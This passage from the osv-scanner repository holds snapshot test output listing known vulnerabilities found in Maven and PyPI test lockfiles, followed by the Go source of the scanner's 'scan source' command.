PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-269g-pwp5-87pp | 4.4 | Maven | junit:junit | 4.12 | 4.13.1 | testdata/maven-transitive/encoding.xml | +-------------------------------------+------+-----------+-------------+---------+---------------+----------------------------------------+ --- [TestCommand_Transitive/pom.xml_non_utf8_encoding - 2] --- [TestCommand_Transitive/pom.xml_offline_no_transitive - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package Loaded Maven local db from /osv-scanner/Maven/all.zip No issues found --- [TestCommand_Transitive/pom.xml_offline_no_transitive - 2] --- [TestCommand_Transitive/pom.xml_transitive_default - 1] Scanning dir ./testdata/maven-transitive/pom.xml Scanned /testdata/maven-transitive/pom.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 5 known vulnerabilities (2 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 5 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/pom.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/pom.xml | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_default - 2] --- [TestCommand_Transitive/pom.xml_transitive_explicit_lockfile - 1] Scanned /testdata/maven-transitive/abc.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 5 known vulnerabilities (2 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 5 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/abc.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/abc.xml | +-------------------------------------+------+-----------+-------------------------------------+---------+---------------+-----------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_explicit_lockfile - 2] --- [TestCommand_Transitive/pom.xml_transitive_native_source - 1] Scanned /testdata/maven-transitive/registry.xml file and found 2 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 2 packages affected by 6 known vulnerabilities (2 Critical, 1 High, 3 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 6 vulnerabilities can be fixed. +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ | https://osv.dev/GHSA-cm6r-892j-jv2g | 6.1 | Maven | com.google.android.gms:play-services-basement | 10.0.0 | 18.0.2 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-7rjr-3q55-vv33 | 9.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.16.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-8489-44mv-ggj8 | 6.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.1 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-jfh8-c2jp-5v3q | 10.0 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.15.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-p6xc-xr62-6r2g | 8.6 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.17.0 | testdata/maven-transitive/registry.xml | | https://osv.dev/GHSA-vc5p-v9hr-52mj | 6.3 | Maven | org.apache.logging.log4j:log4j-core | 2.14.1 | 2.25.3 | testdata/maven-transitive/registry.xml | +-------------------------------------+------+-----------+-----------------------------------------------+---------+---------------+----------------------------------------+ --- [TestCommand_Transitive/pom.xml_transitive_native_source - 2] --- [TestCommand_Transitive/requirements.txt_enricher_requires_extractor - 1] Scanning dir ./testdata/locks-requirements/requirements-transitive.txt Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Transitive/requirements.txt_enricher_requires_extractor - 2] No package sources found, --help for usage information. --- [TestCommand_Transitive/requirements.txt_no_resolve_no_transitive - 1] Scanning dir ./testdata/locks-requirements/requirements.txt Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Total 3 packages affected by 12 known vulnerabilities (1 Critical, 4 High, 6 Medium, 1 Low, 0 Unknown) from 1 ecosystem. 12 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_no_resolve_no_transitive - 2] --- [TestCommand_Transitive/requirements.txt_offline_no_transitive - 1] Scanning dir ./testdata/locks-requirements/requirements.txt Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Loaded PyPI local db from /osv-scanner/PyPI/all.zip Total 3 packages affected by 12 known vulnerabilities (1 Critical, 4 High, 6 Medium, 1 Low, 0 Unknown) from 1 ecosystem. 12 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_offline_no_transitive - 2] --- [TestCommand_Transitive/requirements.txt_resolution_fallback - 1] Scanning dir ./testdata/locks-requirements/unresolvable-requirements.txt Scanned /testdata/locks-requirements/unresolvable-requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 3 packages affected by 9 known vulnerabilities (0 Critical, 3 High, 4 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 9 vulnerabilities can be fixed. +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-43 | 8.7 | PyPI | flask-cors | 1.0.0 | 3.0.9 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-xc3p-ff3m-f46v | | | | | | | | https://osv.dev/PYSEC-2024-71 | 8.7 | PyPI | flask-cors | 1.0.0 | 4.0.2 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-hxwh-jpp2-84pm | | | | | | | | https://osv.dev/GHSA-43qf-4rqw-9q2g | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-7rxf-gvfg-47g4 | 4.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-84pr-m4jr-85g5 | 5.3 | PyPI | flask-cors | 1.0.0 | 4.0.1 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/GHSA-8vgw-p6qm-5gr7 | 5.3 | PyPI | flask-cors | 1.0.0 | 6.0.0 | testdata/locks-requirements/unresolvable-requirements.txt | | https://osv.dev/PYSEC-2020-73 | | PyPI | pandas | 0.23.4 | 1.0.4 | testdata/locks-requirements/unresolvable-requirements.txt | +-------------------------------------+------+-----------+------------+---------+---------------+-----------------------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_resolution_fallback - 2] --- [TestCommand_Transitive/requirements.txt_transitive_default - 1] Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 5 packages affected by 22 known vulnerabilities (1 Critical, 9 High, 10 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 22 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2024-60 | 7.5 | PyPI | idna | 2.7.0 | 3.7 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-jjg7-2v4v-x38h | | | | | | | | https://osv.dev/PYSEC-2020-148 | 6.9 | PyPI | urllib3 | 1.24.3 | 1.25.9 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-wqvq-5m8c-6g24 | | | | | | | | https://osv.dev/PYSEC-2021-108 | | PyPI | urllib3 | 1.24.3 | 1.26.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-192 | 8.1 | PyPI | urllib3 | 1.24.3 | 1.26.17 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-v845-jxx5-vc9f | | | | | | | | https://osv.dev/PYSEC-2023-212 | 5.7 | PyPI | urllib3 | 1.24.3 | 1.26.18 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-g4mx-q9vg-27p4 | | | | | | | | https://osv.dev/GHSA-2xpw-w6gg-jr37 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-34jh-p97f-mpxf | 4.4 | PyPI | urllib3 | 1.24.3 | 1.26.19 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-38jv-5279-wg99 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-gm62-xv2j-4w53 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-pq67-6m6q-mj2v | 5.3 | PyPI | urllib3 | 1.24.3 | 2.5.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_transitive_default - 2] --- [TestCommand_Transitive/requirements.txt_transitive_native_source - 1] Scanned /testdata/locks-requirements/requirements.txt file and found 3 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 5 packages affected by 22 known vulnerabilities (1 Critical, 9 High, 10 Medium, 1 Low, 1 Unknown) from 1 ecosystem. 22 vulnerabilities can be fixed. +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ | https://osv.dev/PYSEC-2021-98 | 6.9 | PyPI | django | 1.11.29 | 2.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-68w8-qjq3-2gfm | | | | | | | | https://osv.dev/GHSA-6w2r-r2m5-xq5w | 7.1 | PyPI | django | 1.11.29 | 4.2.24 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-7xr5-9hcq-chf9 | 4.0 | PyPI | django | 1.11.29 | 4.2.22 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-8x94-hmjh-97hq | 8.8 | PyPI | django | 1.11.29 | 3.2.15 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-frmv-pr5f-9mcr | 9.1 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-qw25-v68c-qjf3 | 7.5 | PyPI | django | 1.11.29 | 4.2.26 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-rrqc-c2jx-6jgv | 6.3 | PyPI | django | 1.11.29 | 4.2.16 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-62 | 8.7 | PyPI | flask | 1.0 | 2.2.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-m2qf-hxjv-5gpq | | | | | | | | https://osv.dev/GHSA-68rp-wp8r-4726 | 2.3 | PyPI | flask | 1.0 | 3.1.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-74 | 6.1 | PyPI | requests | 2.20.0 | 2.31.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-j8r2-6x86-q33q | | | | | | | | https://osv.dev/GHSA-9hjg-9r4m-mvj7 | 5.3 | PyPI | requests | 2.20.0 | 2.32.4 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-9wx4-h78v-vm56 | 5.6 | PyPI | requests | 2.20.0 | 2.32.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2024-60 | 7.5 | PyPI | idna | 2.7 | 3.7 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-jjg7-2v4v-x38h | | | | | | | | https://osv.dev/PYSEC-2020-148 | 6.9 | PyPI | urllib3 | 1.24.3 | 1.25.9 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-wqvq-5m8c-6g24 | | | | | | | | https://osv.dev/PYSEC-2021-108 | | PyPI | urllib3 | 1.24.3 | 1.26.5 | testdata/locks-requirements/requirements.txt | | https://osv.dev/PYSEC-2023-192 | 8.1 | PyPI | urllib3 | 1.24.3 | 1.26.17 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-v845-jxx5-vc9f | | | | | | | | https://osv.dev/PYSEC-2023-212 | 5.7 | PyPI | urllib3 | 1.24.3 | 1.26.18 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-g4mx-q9vg-27p4 | | | | | | | | https://osv.dev/GHSA-2xpw-w6gg-jr37 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-34jh-p97f-mpxf | 4.4 | PyPI | urllib3 | 1.24.3 | 1.26.19 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-38jv-5279-wg99 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.3 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-gm62-xv2j-4w53 | 8.9 | PyPI | urllib3 | 1.24.3 | 2.6.0 | testdata/locks-requirements/requirements.txt | | https://osv.dev/GHSA-pq67-6m6q-mj2v | 5.3 | PyPI | urllib3 | 1.24.3 | 2.5.0 | testdata/locks-requirements/requirements.txt | +-------------------------------------+------+-----------+----------+---------+---------------+----------------------------------------------+ --- [TestCommand_Transitive/requirements.txt_transitive_native_source - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_errors - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_errors - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_is_after_last_vuln_version - 2] --- [TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OffLinux/ssh_version_is_before_first_vuln_version - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_errors - 1] Scanning dir /composer.lock Command "ssh -V": exit status 1 Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_errors - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_is_after_last_vuln_version - 2] --- [TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version - 1] Scanning dir /composer.lock Scanned /composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /osv-scanner-test.toml No issues found --- [TestCommand_WithDetector_OnLinux/ssh_version_is_before_first_vuln_version - 2] --- ================================================ FILE: cmd/osv-scanner/scan/source/command.go ================================================ // Package source implements the `source` subcommand of the `scan` command. package source import ( "context" "errors" "fmt" "io" "net/http" "os" "path/filepath" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/helper" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/models" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/urfave/cli/v3" ) func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command { return &cli.Command{ Name: "source", Usage: "scans a source project's dependencies for known vulnerabilities using the OSV database.", Description: "scans a source project's dependencies for known vulnerabilities using the OSV database.", Flags: append([]cli.Flag{ &cli.StringSliceFlag{ Name: "lockfile", Aliases: []string{"L"}, Usage: "scan package lockfile on this path", TakesFile: true, }, &cli.StringSliceFlag{ Name: "sbom", Aliases: []string{"S"}, Usage: "[DEPRECATED] scan sbom file on this path, the sbom file name must follow the relevant spec", Action: func(_ context.Context, _ *cli.Command, _ []string) error { cmdlogger.Warnf("Warning: --sbom has been deprecated in favor of -L") return nil }, TakesFile: true, }, &cli.BoolFlag{ Name: "recursive", Aliases: []string{"r"}, Usage: "check subdirectories", Value: false, }, &cli.BoolFlag{ Name: "no-ignore", Usage: "also scan files that would be ignored by .gitignore", Value: false, }, &cli.BoolFlag{ Name: "include-git-root", Usage: "include scanning git root (non-submoduled) repositories", Value: false, }, &cli.StringSliceFlag{ Name: "experimental-exclude", Usage: "exclude directory paths during scanning; use g:pattern for glob, r:pattern for regex, or just dirname for exact match (can be repeated)", }, &cli.StringFlag{ Name: "data-source", Usage: "source to fetch package information from; value can be: deps.dev, native", Value: "deps.dev", Action: func(_ context.Context, _ *cli.Command, s string) error { if s != "deps.dev" && s != "native" { return fmt.Errorf("unsupported data-source \"%s\" - must be one of: deps.dev, native", s) } return nil }, }, &cli.StringFlag{ Name: "maven-registry", Usage: "URL of the default registry to fetch Maven metadata", }, }, helper.BuildCommonScanFlags([]string{"lockfile", "sbom", "directory"})...), ArgsUsage: "[directory1 directory2...]", Action: func(ctx context.Context, cmd *cli.Command) error { return action(ctx, cmd, stdout, stderr, client) }, } } func action(_ context.Context, cmd *cli.Command, stdout, stderr io.Writer, client *http.Client) error { format := cmd.String("format") outputPath := cmd.String("output-file") if outputPath == "" { outputPath = cmd.String("output") } serve := cmd.Bool("serve") if serve { format = "html" if outputPath == "" { // Create a temporary directory tmpDir, err := os.MkdirTemp("", "osv-scanner-result") if err != nil { return fmt.Errorf("failed creating temporary directory: %w\n"+ "Please use `--output-file result.html` to specify the output path", err) } // Remove the created temporary directory after defer os.RemoveAll(tmpDir) outputPath = filepath.Join(tmpDir, "index.html") } } scanLicensesAllowlist, err := helper.GetScanLicensesAllowlist(cmd) if err != nil { return err } experimentalScannerActions := helper.GetExperimentalScannerActions(cmd, client) experimentalScannerActions.RequestUserAgent = "osv-scanner_scan-source/" + version.OSVVersion experimentalScannerActions.ExcludePatterns = cmd.StringSlice("experimental-exclude") // Add `source` specific experimental configs experimentalScannerActions.TransitiveScanning = osvscanner.TransitiveScanningActions{ Disabled: cmd.Bool("no-resolve"), NativeDataSource: cmd.String("data-source") == "native", MavenRegistry: cmd.String("maven-registry"), } scannerAction := helper.GetCommonScannerActions(cmd, scanLicensesAllowlist) scannerAction.LockfilePaths = cmd.StringSlice("lockfile") //nolint:staticcheck // ignore our own deprecated field scannerAction.SBOMPaths = cmd.StringSlice("sbom") scannerAction.Recursive = cmd.Bool("recursive") scannerAction.NoIgnore = cmd.Bool("no-ignore") scannerAction.DirectoryPaths = cmd.Args().Slice() scannerAction.ExperimentalScannerActions = experimentalScannerActions var vulnResult models.VulnerabilityResults //nolint:contextcheck // passing the context in would be a breaking change vulnResult, err = osvscanner.DoScan(scannerAction) if cmd.Bool("allow-no-lockfiles") && errors.Is(err, osvscanner.ErrNoPackagesFound) { cmdlogger.Warnf("No package sources found") err = nil } if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) { return err } if errPrint := helper.PrintResult(stdout, stderr, outputPath, format, &vulnResult, scannerAction.ShowAllVulns); errPrint != nil { return fmt.Errorf("failed to write output: %w", errPrint) } // Auto-open outputted HTML file for users. if outputPath != "" { if serve { helper.ServeHTML(outputPath) } else if format == "html" { cmdlogger.Infof("HTML output available at: %s", outputPath) } } // This may be nil. return err } ================================================ FILE: cmd/osv-scanner/scan/source/command_test.go ================================================ package source_test import 